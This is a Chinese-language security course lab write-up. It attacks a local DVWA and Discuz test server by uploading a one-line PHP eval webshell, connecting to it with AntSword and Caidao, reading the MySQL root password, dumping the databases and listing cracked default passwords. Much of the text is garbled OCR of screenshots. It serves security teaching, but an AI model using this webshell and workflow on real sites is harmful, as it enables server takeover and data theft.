Discuz! X PhpSpy (D 192.168.112.100/utility/converVdata/webshe112.php login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect MYSQL Manager » D8Host localhost 3306 D8User: root D8Pass MySQL 5568-MariaD8 running in localhost as root@localhost Please selecta database: ultrax Current dababase: ultrax Run SQL query/queries on database ultrax Name common addonllnsefll Structure Ql_ggl common admincg cmenullnsefll Structure Ql_ggl common admincg_gcgugl Insert I Structure Ql_ggl common admincg member( Insert I Structure Ql_ggl common admincg oerml Insert I Structure Ql_ggl 1234561 Data_lengt D8Charset Create time Default Qu ery Update_üme Engine 2021-05-07 1968 2021-05-07 18152 2021-05-07 1208 2021-05-07 18152 2021-05-07 141K 2021-05-07 MylSAM 2021-05-07 MylSAM 2021-05-07 MylSAM 2021-05-07 MylSAM 2021-05-07 MylSAM enzszy 2008 Safe Mode:No Collation utf8_general_ utf8_general_ utf8_general_ utf8_general_ utf8_general_

 

ucenter settings [ Insert Structure QI_ggl Insen Structure QI_ggl ucenter_tags [ Insert Structure QI_ggl ucenter vars [ Insen Structure QI_gpl Total tables: 241 Z] Save as file 'Vartwww/html/utility/convert/dataJ1g2 16E 112 100 _Mysa 656 a 46140 172M Expon selection table 2021-05-07 2021-05-07 2021-05-07 181524 2021-05-07 18 1524 2021-05-07 2021-05-07 2021-05-07 MylSAM MylSAM MylSAM MEMORY utf8_general utf8_general_ utf8_general_ utf8_general_

 

Discuz! X PhpSpy (D 192.168.112.100/utility/converVdata/webshe112.php login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect File Manager - current diSk tree 4.2 G at 9.72 G (43.26%) Current Directory (Writable, 0755) "Vartwww/html/utility/convert/data/ WebRoot View writable Create File Z] Filename Parent Directo 192 168 112 100_mySQLsq1 configdefaultzng webshe112 Packing download selected - Delete selected Last modified 2021-05-07 11 5643 2011-06-29 38 2021-05-07 11:25 34 2021-05-07 18K 145K 66 98K _MySQL.sql'); Chmod / Perms 0644 / _rvV_r 0644/ rw_r 0644 / _rvV_r 0644/ rw_r enzszy 2008 Safe Mode:No Upload Down Copy Rename Time Down Copy Rename Time Down Copy Rename Time Down Copy Rename Time O directories / 4 files Processed in 0001210 second(s) Copyright (C) 2004-2008 Team All Rights Reserved , l/utility/convert/data/1 92.168.112.100

 

正 在 扌 J 开 1g206 & 1 1 艺 1 [ ℃ MySQL.sql 您 远 择 了 打 开 : 0 192 . 1 8 . 112 . 1U0 MYSQL.sql 文 型 : sq 《 Fi 0 月 KB 〕 来 源 : p 192 · 1 5 & 1 1 2 · 100 您 想 要 Firefox 如 何 处 此 文 件 ? CD 打 开 , i 过 0 汶 」 览 “ 0 保 存 文 囗 以 后 巨 动 采 用 相 同 的 作 处 理 吐 交 。

Down,下载到本地:192.168.112.100_MySQL.sql

DROP TABLE IFEXISTS pre_ucenter_settings;

CREATE TABLEpre_ucenter_settings (

   k varchar(32) NOT NULL,

   v text NOT NULL,

   PRIMARY KEY (k)

);

 

INSERT INTOpre_ucenter_settings VALUES('accessemail', '');

INSERT INTOpre_ucenter_settings VALUES('censoremail', '');

INSERT INTOpre_ucenter_settings VALUES('censorusername', '');

INSERT INTOpre_ucenter_settings VALUES('dateformat', 'y-n-j');

INSERT INTOpre_ucenter_settings VALUES('doublee', '0');

INSERT INTOpre_ucenter_settings VALUES('nextnotetime', '0');

INSERT INTOpre_ucenter_settings VALUES('timeoffset', '28800');

INSERT INTOpre_ucenter_settings VALUES('privatepmthreadlimit', '25');

INSERT INTOpre_ucenter_settings VALUES('chatpmthreadlimit', '30');

INSERT INTOpre_ucenter_settings VALUES('chatpmmemberlimit', '35');

INSERT INTOpre_ucenter_settings VALUES('pmfloodctrl', '15');

INSERT INTOpre_ucenter_settings VALUES('pmcenter', '1');

INSERT INTOpre_ucenter_settings VALUES('sendpmseccode', '1');

INSERT INTOpre_ucenter_settings VALUES('pmsendregdays', '0');

INSERT INTOpre_ucenter_settings VALUES('maildefault', 'username@21cn.com');

INSERT INTOpre_ucenter_settings VALUES('mailsend', '1');

INSERT INTOpre_ucenter_settings VALUES('mailserver', 'smtp.21cn.com');

INSERT INTOpre_ucenter_settings VALUES('mailport', '25');

INSERT INTOpre_ucenter_settings VALUES('mailauth', '1');

INSERT INTOpre_ucenter_settings VALUES('mailfrom', 'UCenter <username@21cn.com>');

INSERT INTOpre_ucenter_settings VALUES('mailauth_username', 'username@21cn.com');

INSERT INTOpre_ucenter_settings VALUES('mailauth_password', 'password');

INSERT INTOpre_ucenter_settings VALUES('maildelimiter', '0');

INSERT INTOpre_ucenter_settings VALUES('mailusername', '1');

INSERT INTOpre_ucenter_settings VALUES('mailsilent', '1');

INSERT INTOpre_ucenter_settings VALUES('version', '1.6.0');

 

三、下载数据库到本地

回到菜刀工具上把拿到的数据库文件下载到Kali主机

把光标点到菜刀工具的路径上,按下回车键,使菜单工具重新读取,此时会发现刚刚我们下载的192.168.112.100_MySQL.sql文件

回到kali主机上的目录查看

也可以使用菜刀下载,回到菜刀需要点击右键更新缓存。

到这里就完成了。如果入侵的系统版本较低,我们就可以使用apache用户进行提权操作。然后我们就拥有root权限了!

 

 

总结:

■4.1 快速搭建Discuz论坛

■4.2 使用Kali下Burp Suite对Discuz后台注入PHP木马

■4.3 使用Cknife“菜刀”上传webshell木马到网站

■4.4 使用Webshell查看MySQL数据库密码并盗取数据库

 

 

 

实验项目4作业:

DVWA靶场实验环境-文件上传漏洞获取Web权限

FileUpload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx 等都曝出过文件上传漏洞。

(1)DVWA的File Upload上传webshell.php

Instructions p 1 Reset DB Brute Force Command Injection CSRF File Inclusion File Upload Vulnerability: File Upload Choose an image to upload: webshell_php Upload . /.. / hackable/uploads/webshell. php succesfully uploaded! More Information

Web站点查看文件上传的位置,根据提示是在../../hackable/uploads/webshell.php

[root@wgxy ~]# cd/var/www/html/DVWA-master/hackable/uploads

[root@wgxy uploads]# ls

dvwa_email.pngwebshell.php

[root@wgxy uploads]#cat webshell.php

<?php @eval($_POST[wgxy]);?>

[root@1991ch —]# cd /var/www/html/DVWA-master/hackable/uploads [root@1991ch Is dvwa_email.png webshell . php [root@1991ch uploads]# cat webshell.php <?php

(2)使用蚁剑连接一句话木马

打开蚁剑加载器,在空白处单击鼠标右键,点击添加数据

URL地址:http://192.168.112.100/DVWA-master/hackable/uploads/webshell.php

密码为wgxy ,用于接受post 方式提交的数据

0 中 国 蚁 刽 AntSword 編 0 设 舌 掘 管 理 ( 0 ) RI-ffåll 到 二 0 分 类 目 录 ( 1 ) 0 基 石 舌 连 接 密 码 网 站 备 窪 码 设 舌 连 接 类 型 e 清 求 信 息 其 他 舌 0 0 默 认 分 类 A 重 命 名 0 http濯1g2. 158 过 12 · 1 的 / DVW m / h k 北 0 《 彐 蚓 w 北 sh 蚍 的 p wgxq 玛 器 @ defal 」 It 怀 推 荐 C) ba 54

添加

0 中 国 蚁 刽 AntSword 編 0 设 舌 掘 管 理 ( 1 ) RI-ffåll 到 二 0 分 类 目 录 ( 1 ) 三 1g2 . 158 . 11 艺 1D0 物 理 位 舌 网 方 和 网 站 备 窪 创 津 时 闾 2021 / 05 / 07 16 : 32 : 35 更 新 时 闾 2021 / 05 / 07 16 : 32 : 35 0 0 默 认 分 类 A 重 命 名 http://lg艺 16 & 112 . 100 / DV 幫 0 一 m 0

 

AntSword 192.168.112.100 DVWA-master hackable /var/wmv/html/DVWA-master/hackable/uqloads/ dvvva_email .png webshell.php 2020-11-21 2021-05-07 667 b 29 b

上传下载文件,也可删除文件:

注:仅在Web站点目录可进行上传,因为当前用户仅对Web站点目录拥有写权限,下载文件则需要拥有对下载文件的读权限。

0 中 国 蚊 釗 AntSword を 口 瀲 こ 192.1b8.112.100 こ 目 列 表 ( 0 ) 「 「 1 DVWA-master 「 「 1 hackable 文 件 列 表 ( 2 ) 0 新 建 0 刷 新 A 主 目 隶 刷 新 目 隶 0 WGET ↓ 上 佶 文 件 ↓ 下 戰 文 件 皂 制 文 件 粘 貼 文 件 ◎ 文 件 ノ 輯 文 件 住 刪 畭 文 件 A 重 命 名 文 件 0 更 改 文 件 日 寸 囘 響 更 改 枳 限 0 新 建 - 在 此 打 朞 終 /var/mwv/html/DVWA-master/hackabIe/upIoads/ ロ 属 性 X 个 上 に 名 称 d れ em 訂 ・ 叩 」 webshell.php を 任 ダ 俵 日 期 2020-11-21 13 : 12 ユ 8 2021-05-07 07 : 00 : 42 557 け

上传文件webshell2.php:

AntSword 192.168.112.100 DVWA-master hackable /var/wmv/html/DVWA-master/hackable/uqloads/ dvvva_email .png webshell. php webshe112.php webshe112.php ,/var/vvvvw/html/C 2020-11-21 2021-05-07 2021-05-07 êl]padiâ] 2021-05-07 667 b 29 b 66.98 Kb 2021-05-07

用caidao-20160622\caidao.exe菜刀连接:

http://192.168.112.100/DVWA-master/hackable/uploads/webshell2.php

亡 192 16 & 1 1 巳 1 囗 囗 19 巳 16 & 1 1 巳 1 囗 囗 0 we 名 称 htm iLpng bshe1L php bshe11Z php 时 闾 2 囗 2 囗 一 1 1 一 21 2 囗 21 北 〕 7 2 囗 21 北 〕 7 13 : 12 : 18 囗 7 :OO : 42 囗 8 : 59 : 3 囗 667 29 DVNÅ—m as t e hackable 0 uplo 的 莱刀@20160522@儲 ida 。 conf 读 取 中 囗 644 囗 644 更 新 缍 存 盾 空 吡 网 站 缍 存 下 载 件 到 务 器 上 传 件 下 载 件 重 命 名 改 件 〕 时 闾 虚 拟 终 星 2 囗 21 删 5 删 7 三 月 廿 一 站 点 类 另 刂 0 默 认 类 另 刂 巧 rp G 82312

 

浏览器URL:http://192.168.112.100/DVWA-master/hackable/uploads/webshell2.php

192.168.112.100/DVWA-master 192.168.112.100 /DVWA-master/hackable/upIoads/webshe112.php @ loginPHP @ DVWA-master @Please sign in @localhost access only!! login Password :

输入密码:wgxy

 

PhpSpy (D 192.168.112.100 /DVWA-master/hackable/uploads/webshe112.php @ login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect File Manager - current diSk tree 4.26 G at 9.72 G (43.8%) Current Directory (Writable, 0755) "Vartwww/html/D\fWA-master/hackable/uploads/ WebRoot View writable Create File Filename Parent Directo tvwa emailug webshellang webshe112 Packing download selected - Delete selected Last modified 2020-11-21 2021-05-07 2021-05-07 08 30 667 a 67 36K Chmod / Perms 0644 / _rvV_r 0644/ 0644 / _rvV_r Copyright (C) 2004-2008 Team All Rights Reserved enzszy 2008 Safe Mode:No Upload Down Copy Rename Time Down Copy Rename Time Down Copy Rename Time O directories 13 files Processed in 0 000778 second(s)

PhpSpy (D 192.168.112.100 /DVWA-master/hackable/uploads/webshe112.php @ login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect File Manager - current diSk tree 4.26 G at 9.72 G (43.8%) Current Directory (Writable, 0755) "Vartwww/html/ WebRoot View writable Create File Filename Parent Directo Dun-master Tes H p lggln lgginpHp sgli-labs skill]ntml Packing download selected - Delete selected Last modified 2021-04-29 17:37 46 2020-11-21 135532 2020-11-21 1347 33 2021-05-01 032830 2021-05-01 105327 2020-11-21 131231 2020-11-21 2020-11-21 178 21 a Chmod / Perms 0755 / drwxr-xr-x 0755 / drwxr-xr-x 0755 / drwxr-xr-x 0755 / drwxr-xr-x 0755 / drwxr-xr-x 0755 / drwxr-xr-x 0644 / _rvV_r 0644/ rw_r Copyright (C) 2004-2008 Team All Rights Reserved enzszy 2008 Safe Mode:No Upload Qgl Rename Qgl Rename Qgl Rename Qgl Rename Qgl Rename Qgl Rename Down Copy Rename Time Down Copy Rename Time 6 directories 12 files Processed in 0000474 second(s)

 

使用webshell查看MySQL数据库密码并盗取数据库:

获取MySQL密码: 进到 /var/www/html/DVWA-master/config/config.inc.php

数据库:dvwa,用户名:root,密码:123456

PhpSpy (D 192.168.112.100 /DVWA-master/hackable/uploads/webshe112.ph @ login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect create 1 Edit File Current File (impon new file name and new file) Nartwww/html/D\fWA-master/config/configÄncphp File Content < 2 php If are having problems connecting to the MySQL database and all of the variables below are rect changing the variable from LocaLNzst to 127.0.0. I. Fixes a problem due to sockets. Thanks to the fix. Database management system to use enzszy 2008 Safe Mode:No s; DEUS 'YrsaL' ; // Currently disabled Database variables WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup. Please use a database dedicated to If you are using Marians then you cannot use not, must use create a dedicated user. See REANE.md more Information on this. ' db_åatabase' I 'db_user' I '127.0.0.1'; 'root'; '123456', Only used with PostgreSQL/PGSQL database selection. 'db_pcrt 'l - '5432'; Submit

 

连接数据库:

MySQLManager

DBPass:123456

Connect

选择数据库:dvwa

显示表:guestbook和users

PhpSpy (D 192.168.112.100 /DVWA-master/hackable/uploads/webshe112.php @ login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect MYSQL Manager » D8Host localhost 3306 D8User: root D8Pass: Data_length 16K 16K 123456 D8Charset MySQL 5568-MariaD8 running in localhost as root@localhost Please selecta database: tv-wa Current dababase: tvwa Run SQL query/queries on database tvwa: Default Qu ery Update_üme Name guestbook( Insen Structure users I Insen Structure Ql_ggl Total tables: 2 Rows Create time 2020-11-22 002524 2020-11-22002524 Engine InnoD8 InnoD8 enzszy 2008 Safe Mode:No latinl Swedish ci latinl Swedish ci Save as file "Vartwww/html/D\fWA-master/hackable/uploads/1g2168 11 Copyright (C) 2004-2008 Team [SATI All Rights Reserved Expon selection table Processed in 0 004081 second(s)

下载数据库到/var/www/html/DVWA-master/hackable/uploads/192.168.112.100_MySQL.sql

PhpSpy (D 192.168.112.100 /DVWA-master/hackable/uploads/webshe112.php @ login @ loginPHP @ DVWA-master @Please sign in @localhost access only!! 192.168.112.100(192.168.112.100) Egggu_t File Manage! mySQL Manage! mySQL Uoload & Download Execute Command PHP Variable Eval PHP Code Back Connect Database has success backup to :var:www:html.OVWA-master:hackable:uploads:1g2.168.112.100_t1ySOL.sql MYSQL Manager » D8Host localhost 3306 D8User: root D8Pass: Data_length 16K 16K 123456 Create time D8Charset MySQL 5568-MariaD8 running in localhost as root@localhost Please selecta database: tv-wa Current dababase: tvwa Run SQL query/queries on database tvwa: Rows Default Qu ery Update_üme Name guestbook( Insen Structure users I Insen Structure Ql_ggl Total tables: 2 2020-11-22 002524 2020-11-22002524 Engine InnoD8 InnoD8 enzszy 2008 Safe Mode:No latinl Swedish ci latinl Swedish ci Save as file "Vartwww/html/D\fWA-master/hackable/uploads/1g2168 11 Expon selection table

 

FileManager,找到/var/www/html/DVWA-master/hackable/uploads/192.168.112.100_MySQL.sql

计算机生成了可选文字:PhpSpy@192.1.112.100/DVWA-master/hackable/uplt〕ads/webshe112.php0loginloginPHPDVWA-master0pleasesignin0c引卜ostaccessonly!!19艺168·11艺100(19艺168·11艺100》Log皇《FileManage!《MYSQLManage!《MYSQLad&DOW劑03d《ExecuteCommand《PHPVi30《EvalPHPCode《BackConnectFileManager-Currentdisktree4.26Got972G(43.8%)CurrentctO00t3e075嗨中tml/DV1•一master/hacka引e地訓03dWebRoot《View30《I豇/《CreateFile[囗[囗[囗[囗FilenameParentDirecto192158112IOO_mySQLsql嗨3emailugwebsh引上0〕0websh引《20〕0Packlngdow劑03dselected_DeleteselectedLastmodd2021一057og50052020一11一211302182021一0570700422021一057085930t07K5575735KChmod/Perms0044/一0544/0044/一0544/C00川ght(C)2004一2008旦;/AngelTeam《RightsRese「:移动上的韦〕Ve「2008SaModenou訓030Down《Copy《Edit《Rename《TimeDown《Copy《Edit《Rename《TimeDown《Copy《Edit《Rename《TimeDown《Copy《Edit《Rename《Time0dlrectories/4esProcessedin住004271second(s)

Down,下载到本地:192.168.112.100_MySQL.sql

DROP TABLE IFEXISTS users;

CREATE TABLEusers (

   user_id int(6) NOT NULL,

   first_name varchar(15),

   last_name varchar(15),

   uservarchar(15),

   passwordvarchar(32),

   avatar varchar(70),

   last_login timestamp DEFAULT'CURRENT_TIMESTAMP' NOT NULL on update CURRENT_TIMESTAMP,

   failed_login int(3),

   PRIMARY KEY (user_id)

);

 

INSERT INTOusers VALUES('1', 'admin', 'admin', 'admin','5f4dcc3b5aa765d61d8327deb882cf99','/hackable/users/admin.jpg', '2020-11-22 00:25:24', '0');

INSERT INTOusers VALUES('2', 'Gordon', 'Brown', 'gordonb','e99a18c428cb38d5f260853678922e03','/hackable/users/gordonb.jpg', '2020-11-22 00:25:24', '0');

INSERT INTOusers VALUES('3', 'Hack', 'Me', '1337', '8d3533d75ae2c3966d7e0d4fcc69216b','/hackable/users/1337.jpg', '2020-11-22 00:25:24', '0');

INSERT INTOusers VALUES('4', 'Pablo', 'Picasso', 'pablo','0d107d09f5bbe40cade3de5c71e9e9b7','/hackable/users/pablo.jpg', '2020-11-22 00:25:24', '0');

INSERT INTOusers VALUES('5', 'Bob', 'Smith', 'smithy','5f4dcc3b5aa765d61d8327deb882cf99','/hackable/users/smithy.jpg', '2020-11-22 00:25:24', '0');

即:DVWA默认的账户有5个,用户名/密码如下:

admin/password

gordonb/abc123

1337/charley

pablo/letmein

smithy/password

 


                         wgxy


                   2020-2021-2第11周2021.05.10-12